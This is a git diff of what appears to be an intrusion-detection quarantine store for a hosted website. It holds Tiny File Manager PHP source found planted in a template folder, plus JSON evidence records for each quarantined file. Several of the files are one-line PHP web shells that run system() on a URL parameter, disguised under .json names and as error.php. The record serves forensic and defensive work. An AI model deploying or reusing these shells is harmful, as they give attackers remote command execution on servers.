fa-file-word-o'; + break; + case 'ppt': + case 'pptx': + $img = 'fa fa-file-powerpoint-o'; + break; + case 'ttf': + case 'ttc': + case 'otf': + case 'woff': + case 'woff2': + case 'eot': + case 'fon': + $img = 'fa fa-font'; + break; + case 'pdf': + $img = 'fa fa-file-pdf-o'; + break; + case 'psd': + case 'ai': + case 'eps': + case 'fla': + case 'swf': + $img = 'fa fa-file-image-o'; + break; + case 'exe': + case 'msi': + $img = 'fa fa-file-o'; + break; + case 'bat': + $img = 'fa fa-terminal'; + break; + default: + $img = 'fa fa-info-circle'; + } + + return $img; +} + +/** + * Get image files extensions + * @return array + */ +function fm_get_image_exts() +{ + return array('ico', 'gif', 'jpg', 'jpeg', 'jpc', 'jp2', 'jpx', 'xbm', 'wbmp', 'png', 'bmp', 'tif', 'tiff', 'psd', 'svg', 'webp', 'avif'); +} + +/** + * Get video files extensions + * @return array + */ +function fm_get_video_exts() +{ + return array('avi', 'webm', 'wmv', 'mp4', 'm4v', 'ogm', 'ogv', 'mov', 'mkv'); +} + +/** + * Get audio files extensions + * @return array + */ +function fm_get_audio_exts() +{ + return array('wav', 'mp3', 'ogg', 'm4a'); +} + +/** + * Get text file extensions + * @return array + */ +function fm_get_text_exts() +{ + return array( + 'txt', 'css', 'ini', 'conf', 'log', 'htaccess', 'passwd', 'ftpquota', 'sql', 'js', 'ts', 'jsx', 'tsx', 'mjs', 'json', 'sh', 'config', + 'php', 'php4', 'php5', 'phps', 'phtml', 'htm', 'html', 'shtml', 'xhtml', 'xml', 'xsl', 'm3u', 'm3u8', 'pls', 'cue', 'bash', 'vue', + 'eml', 'msg', 'csv', 'bat', 'twig', 'tpl', 'md', 'gitignore', 'less', 'sass', 'scss', 'c', 'cpp', 'cs', 'py', 'go', 'zsh', 'swift', + 'map', 'lock', 'dtd', 'svg', 'asp', 'aspx', 'asx', 'asmx', 'ashx', 'jsp', 'jspx', 'cgi', 'dockerfile', 'ruby', 'yml', 'yaml', 'toml', + 'vhost', 'scpt', 'applescript', 'csx', 'cshtml', 'c++', 'coffee', 'cfm', 'rb', 'graphql', 'mustache', 'jinja', 'http', 'handlebars', + 'java', 'es', 'es6', 'markdown', 'wiki', 'tmp', 'top', 'bot', 'dat', 'bak', 'htpasswd', 'pl' + ); +} + +/** + * Get mime types of text files + * @return array + */ +function fm_get_text_mimes() +{ + return array( + 'application/xml', + 'application/javascript', + 'application/x-javascript', + 'image/svg+xml', + 'message/rfc822', + 'application/json', + ); +} + +/** + * Get file names of text files w/o extensions + * @return array + */ +function fm_get_text_names() +{ + return array( + 'license', + 'readme', + 'authors', + 'contributors', + 'changelog', + ); +} + +/** + * Get online docs viewer supported files extensions + * @return array + */ +function fm_get_onlineViewer_exts() +{ + return array('doc', 'docx', 'xls', 'xlsx', 'pdf', 'ppt', 'pptx', 'ai', 'psd', 'dxf', 'xps', 'rar', 'odt', 'ods'); +} + +/** + * It returns the mime type of a file based on its extension. + * @param extension The file extension of the file you want to get the mime type for. + * @return string|string[] The mime type of the file. + */ +function fm_get_file_mimes($extension) +{ + $fileTypes['swf'] = 'application/x-shockwave-flash'; + $fileTypes['pdf'] = 'application/pdf'; + $fileTypes['exe'] = 'application/octet-stream'; + $fileTypes['zip'] = 'application/zip'; + $fileTypes['doc'] = 'application/msword'; + $fileTypes['xls'] = 'application/vnd.ms-excel'; + $fileTypes['ppt'] = 'application/vnd.ms-powerpoint'; + $fileTypes['gif'] = 'image/gif'; + $fileTypes['png'] = 'image/png'; + $fileTypes['jpeg'] = 'image/jpg'; + $fileTypes['jpg'] = 'image/jpg'; + $fileTypes['webp'] = 'image/webp'; + $fileTypes['avif'] = 'image/avif'; + $fileTypes['rar'] = 'application/rar'; + + $fileTypes['ra'] = 'audio/x-pn-realaudio'; + $fileTypes['ram'] = 'audio/x-pn-realaudio'; + $fileTypes['ogg'] = 'audio/x-pn-realaudio'; + + $fileTypes['wav'] = 'video/x-msvideo'; + $fileTypes['wmv'] = 'video/x-msvideo'; + $fileTypes['avi'] = 'video/x-msvideo'; + $fileTypes['asf'] = 'video/x-msvideo'; + $fileTypes['divx'] = 'video/x-msvideo'; + + $fileTypes['mp3'] = 'audio/mpeg'; + $fileTypes['mp4'] = 'audio/mpeg'; + $fileTypes['mpeg'] = 'video/mpeg'; + $fileTypes['mpg'] = 'video/mpeg'; + $fileTypes['mpe'] = 'video/mpeg'; + $fileTypes['mov'] = 'video/quicktime'; + $fileTypes['swf'] = 'video/quicktime'; + $fileTypes['3gp'] = 'video/quicktime'; + $fileTypes['m4a'] = 'video/quicktime'; + $fileTypes['aac'] = 'video/quicktime'; + $fileTypes['m3u'] = 'video/quicktime'; + + $fileTypes['php'] = ['application/x-php']; + $fileTypes['html'] = ['text/html']; + $fileTypes['txt'] = ['text/plain']; + //Unknown mime-types should be 'application/octet-stream' + if(empty($fileTypes[$extension])) { + $fileTypes[$extension] = ['application/octet-stream']; + } + return $fileTypes[$extension]; +} + +/** + * This function scans the files and folder recursively, and return matching files + * @param string $dir + * @param string $filter + * @return array|null + */ + function scan($dir = '', $filter = '') { + $path = FM_ROOT_PATH.'/'.$dir; + if($path) { + $ite = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path)); + $rii = new RegexIterator($ite, "/(" . $filter . ")/i"); + + $files = array(); + foreach ($rii as $file) { + if (!$file->isDir()) { + $fileName = $file->getFilename(); + $location = str_replace(FM_ROOT_PATH, '', $file->getPath()); + $files[] = array( + "name" => $fileName, + "type" => "file", + "path" => $location, + ); + } + } + return $files; + } +} + +/** +* Parameters: downloadFile(File Location, File Name, +* max speed, is streaming +* If streaming - videos will show as videos, images as images +* instead of download prompt +* https://stackoverflow.com/a/13821992/1164642 +*/ +function fm_download_file($fileLocation, $fileName, $chunkSize = 1024) +{ + if (connection_status() != 0) + return (false); + $extension = pathinfo($fileName, PATHINFO_EXTENSION); + + $contentType = fm_get_file_mimes($extension); + + if(is_array($contentType)) { + $contentType = implode(' ', $contentType); + } + + $size = filesize($fileLocation); + + if ($size == 0) { + fm_set_msg(lng('Zero byte file! Aborting download'), 'error'); + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); + + return (false); + } + + @ini_set('magic_quotes_runtime', 0); + $fp = fopen("$fileLocation", "rb"); + + if ($fp === false) { + fm_set_msg(lng('Cannot open file! Aborting download'), 'error'); + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); + return (false); + } + + // headers + header('Content-Description: File Transfer'); + header('Expires: 0'); + header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); + header('Pragma: public'); + header("Content-Transfer-Encoding: binary"); + header("Content-Type: $contentType"); + + $contentDisposition = 'attachment'; + + if (strstr($_SERVER['HTTP_USER_AGENT'], "MSIE")) { + $fileName = preg_replace('/\./', '%2e', $fileName, substr_count($fileName, '.') - 1); + header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); + } else { + header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); + } + + header("Accept-Ranges: bytes"); + $range = 0; + + if (isset($_SERVER['HTTP_RANGE'])) { + list($a, $range) = explode("=", $_SERVER['HTTP_RANGE']); + str_replace($range, "-", $range); + $size2 = $size - 1; + $new_length = $size - $range; + header("HTTP/1.1 206 Partial Content"); + header("Content-Length: $new_length"); + header("Content-Range: bytes $range$size2/$size"); + } else { + $size2 = $size - 1; + header("Content-Range: bytes 0-$size2/$size"); + header("Content-Length: " . $size); + } + $fileLocation = realpath($fileLocation); + while (ob_get_level()) ob_end_clean(); + readfile($fileLocation); + + fclose($fp); + + return ((connection_status() == 0) and !connection_aborted()); +} + +/** + * If the theme is dark, return the text-white and bg-dark classes. + * @return string the value of the variable. + */ +function fm_get_theme() { + $result = ''; + if(FM_THEME == "dark") { + $result = "text-white bg-dark"; + } + return $result; +} + +/** + * Class to work with zip files (using ZipArchive) + */ +class FM_Zipper +{ + private $zip; + + public function __construct() + { + $this->zip = new ZipArchive(); + } + + /** + * Create archive with name $filename and files $files (RELATIVE PATHS!) + * @param string $filename + * @param array|string $files + * @return bool + */ + public function create($filename, $files) + { + $res = $this->zip->open($filename, ZipArchive::CREATE); + if ($res !== true) { + return false; + } + if (is_array($files)) { + foreach ($files as $f) { + $f = fm_clean_path($f); + if (!$this->addFileOrDir($f)) { + $this->zip->close(); + return false; + } + } + $this->zip->close(); + return true; + } else { + if ($this->addFileOrDir($files)) { + $this->zip->close(); + return true; + } + return false; + } + } + + /** + * Extract archive $filename to folder $path (RELATIVE OR ABSOLUTE PATHS) + * @param string $filename + * @param string $path + * @return bool + */ + public function unzip($filename, $path) + { + $res = $this->zip->open($filename); + if ($res !== true) { + return false; + } + if ($this->zip->extractTo($path)) { + $this->zip->close(); + return true; + } + return false; + } + + /** + * Add file/folder to archive + * @param string $filename + * @return bool + */ + private function addFileOrDir($filename) + { + if (is_file($filename)) { + return $this->zip->addFile($filename); + } elseif (is_dir($filename)) { + return $this->addDir($filename); + } + return false; + } + + /** + * Add folder recursively + * @param string $path + * @return bool + */ + private function addDir($path) + { + if (!$this->zip->addEmptyDir($path)) { + return false; + } + $objects = scandir($path); + if (is_array($objects)) { + foreach ($objects as $file) { + if ($file != '.' && $file != '..') { + if (is_dir($path . '/' . $file)) { + if (!$this->addDir($path . '/' . $file)) { + return false; + } + } elseif (is_file($path . '/' . $file)) { + if (!$this->zip->addFile($path . '/' . $file)) { + return false; + } + } + } + } + return true; + } + return false; + } +} + +/** + * Class to work with Tar files (using PharData) + */ +class FM_Zipper_Tar +{ + private $tar; + + public function __construct() + { + $this->tar = null; + } + + /** + * Create archive with name $filename and files $files (RELATIVE PATHS!) + * @param string $filename + * @param array|string $files + * @return bool + */ + public function create($filename, $files) + { + $this->tar = new PharData($filename); + if (is_array($files)) { + foreach ($files as $f) { + $f = fm_clean_path($f); + if (!$this->addFileOrDir($f)) { + return false; + } + } + return true; + } else { + if ($this->addFileOrDir($files)) { + return true; + } + return false; + } + } + + /** + * Extract archive $filename to folder $path (RELATIVE OR ABSOLUTE PATHS) + * @param string $filename + * @param string $path + * @return bool + */ + public function unzip($filename, $path) + { + $res = $this->tar->open($filename); + if ($res !== true) { + return false; + } + if ($this->tar->extractTo($path)) { + return true; + } + return false; + } + + /** + * Add file/folder to archive + * @param string $filename + * @return bool + */ + private function addFileOrDir($filename) + { + if (is_file($filename)) { + try { + $this->tar->addFile($filename); + return true; + } catch (Exception $e) { + return false; + } + } elseif (is_dir($filename)) { + return $this->addDir($filename); + } + return false; + } + + /** + * Add folder recursively + * @param string $path + * @return bool + */ + private function addDir($path) + { + $objects = scandir($path); + if (is_array($objects)) { + foreach ($objects as $file) { + if ($file != '.' && $file != '..') { + if (is_dir($path . '/' . $file)) { + if (!$this->addDir($path . '/' . $file)) { + return false; + } + } elseif (is_file($path . '/' . $file)) { + try { + $this->tar->addFile($path . '/' . $file); + } catch (Exception $e) { + return false; + } + } + } + } + return true; + } + return false; + } +} + +/** + * Save Configuration + */ + class FM_Config +{ + var $data; + + function __construct() + { + global $root_path, $root_url, $CONFIG; + $fm_url = $root_url.$_SERVER["PHP_SELF"]; + $this->data = array( + 'lang' => 'en', + 'error_reporting' => true, + 'show_hidden' => true + ); + $data = false; + if (strlen($CONFIG)) { + $data = fm_object_to_array(json_decode($CONFIG)); + } else { + $msg = 'Tiny File Manager
Error: Cannot load configuration'; + if (substr($fm_url, -1) == '/') { + $fm_url = rtrim($fm_url, '/'); + $msg .= '
'; + $msg .= '
Seems like you have a trailing slash on the URL.'; + $msg .= '
Try this link: ' . $fm_url . ''; + } + die($msg); + } + if (is_array($data) && count($data)) $this->data = $data; + else $this->save(); + } + + function save() + { + $fm_file = __FILE__; + $var_name = '$CONFIG'; + $var_value = var_export(json_encode($this->data), true); + $config_string = " + + ' . $_SESSION[FM_SESSION_ID]['message'] . '

'; + unset($_SESSION[FM_SESSION_ID]['message']); + unset($_SESSION[FM_SESSION_ID]['status']); + } +} + +/** + * Show page header in Login Form + */ +function fm_show_header_login() +{ +$sprites_ver = '20160315'; +header("Content-Type: text/html; charset=utf-8"); +header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0"); +header("Pragma: no-cache"); + +global $lang, $root_url, $favicon_path; +?> + + + + + + + + + + '; } ?> + <?php echo fm_enc(APP_TITLE) ?> + + + + +"> +
+ + +
+ + + + + + + + + + + + + + + '; } ?> + <?php echo fm_enc(APP_TITLE) ?> + + + + + + + + + + + + + + "> +
+ + + + + + + + + + + + + +
+ + + + + + + + + + + + +
+ + + diff --git a/var/www/hosting/archline.hu/www/templates/category/tiny.php.evidence.json b/var/www/hosting/archline.hu/www/templates/category/tiny.php.evidence.json new file mode 100644 index 0000000..df97e07 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/category/tiny.php.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3036", + "log_excerpt": "[quarantine] www.archline.hu:templates/category/tiny.php -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/category/tiny.php)", + "original_sha256": "98b2837e19f064dbc4605604fd1e27bc10c29f4d24c5187cc6e0a8111ff76d58", + "original_stat": { + "gid": 30037, + "mtime": 1718030776, + "size": 196420, + "uid": 20043 + }, + "rel_path": "templates/category/tiny.php", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/i9wliit0.php.json b/var/www/hosting/archline.hu/www/templates/i9wliit0.php.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/i9wliit0.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/i9wliit0.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/i9wliit0.php.json.evidence.json new file mode 100644 index 0000000..8252538 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/i9wliit0.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2938", + "log_excerpt": "[quarantine] www.archline.hu:templates/i9wliit0.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/i9wliit0.php.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783930701, + "size": 57, + "uid": 20043 + }, + "rel_path": "templates/i9wliit0.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.json b/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.json.evidence.json b/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.json.evidence.json new file mode 100644 index 0000000..1d37302 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2953", + "log_excerpt": "[quarantine] www.archline.hu:templates/r0ps_3tdj3r.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111934, + "size": 74, + "uid": 20043 + }, + "rel_path": "templates/r0ps_3tdj3r.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.php.json b/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.php.json.evidence.json new file mode 100644 index 0000000..48a6a0a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2955", + "log_excerpt": "[quarantine] www.archline.hu:templates/r0ps_3tdj3r.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/r0ps_3tdj3r.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111917, + "size": 74, + "uid": 20043 + }, + "rel_path": "templates/r0ps_3tdj3r.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.json b/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.json.evidence.json b/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.json.evidence.json new file mode 100644 index 0000000..ddff90b --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2937", + "log_excerpt": "[quarantine] www.archline.hu:templates/r0ps_bijdps.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111770, + "size": 74, + "uid": 20043 + }, + "rel_path": "templates/r0ps_bijdps.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.php.json b/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.php.json.evidence.json new file mode 100644 index 0000000..5baee9f --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2948", + "log_excerpt": "[quarantine] www.archline.hu:templates/r0ps_bijdps.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/r0ps_bijdps.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111753, + "size": 74, + "uid": 20043 + }, + "rel_path": "templates/r0ps_bijdps.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.json b/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.json.evidence.json b/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.json.evidence.json new file mode 100644 index 0000000..ca82e54 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2959", + "log_excerpt": "[quarantine] www.archline.hu:templates/r0ps_qbi8yu.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111789, + "size": 74, + "uid": 20043 + }, + "rel_path": "templates/r0ps_qbi8yu.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.php.json b/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.php.json.evidence.json new file mode 100644 index 0000000..080184d --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2944", + "log_excerpt": "[quarantine] www.archline.hu:templates/r0ps_qbi8yu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/r0ps_qbi8yu.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111772, + "size": 74, + "uid": 20043 + }, + "rel_path": "templates/r0ps_qbi8yu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/amwhwyys.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/amwhwyys.php.json new file mode 100644 index 0000000..982bc2b --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/amwhwyys.php.json @@ -0,0 +1 @@ +';if(isset($_GET['cmd'])){echo'
';system($_GET['cmd']);echo'
';}echo'';?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/amwhwyys.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/amwhwyys.php.json.evidence.json new file mode 100644 index 0000000..ea155d5 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/amwhwyys.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2983", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/amwhwyys.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/amwhwyys.php.json)", + "original_sha256": "5f9fadd5d78ebe33acaa6f95602ea8b6ba716fe64dac17a20c259ecd32f2dacb", + "original_stat": { + "gid": 30037, + "mtime": 1784057814, + "size": 146, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/amwhwyys.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/error.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/error.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/error.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/error.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/error.php.json.evidence.json new file mode 100644 index 0000000..4612b52 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/error.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2974", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/error.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/error.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111945, + "size": 74, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/error.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_5pvatqpr.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_5pvatqpr.php.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_5pvatqpr.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_5pvatqpr.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_5pvatqpr.php.json.evidence.json new file mode 100644 index 0000000..385c94e --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_5pvatqpr.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2997", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/_h3x_5pvatqpr.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_5pvatqpr.php.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783843871, + "size": 45, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/_h3x_5pvatqpr.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_pxw542fd.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_pxw542fd.php.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_pxw542fd.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_pxw542fd.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_pxw542fd.php.json.evidence.json new file mode 100644 index 0000000..6adcfb4 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_pxw542fd.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3001", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/_h3x_pxw542fd.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_pxw542fd.php.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783841988, + "size": 45, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/_h3x_pxw542fd.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_r7txcnhr.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_r7txcnhr.php.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_r7txcnhr.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_r7txcnhr.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_r7txcnhr.php.json.evidence.json new file mode 100644 index 0000000..d29a19a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_r7txcnhr.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3000", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/_h3x_r7txcnhr.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_r7txcnhr.php.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783841993, + "size": 45, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/_h3x_r7txcnhr.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_znv7fh9d.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_znv7fh9d.php.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ 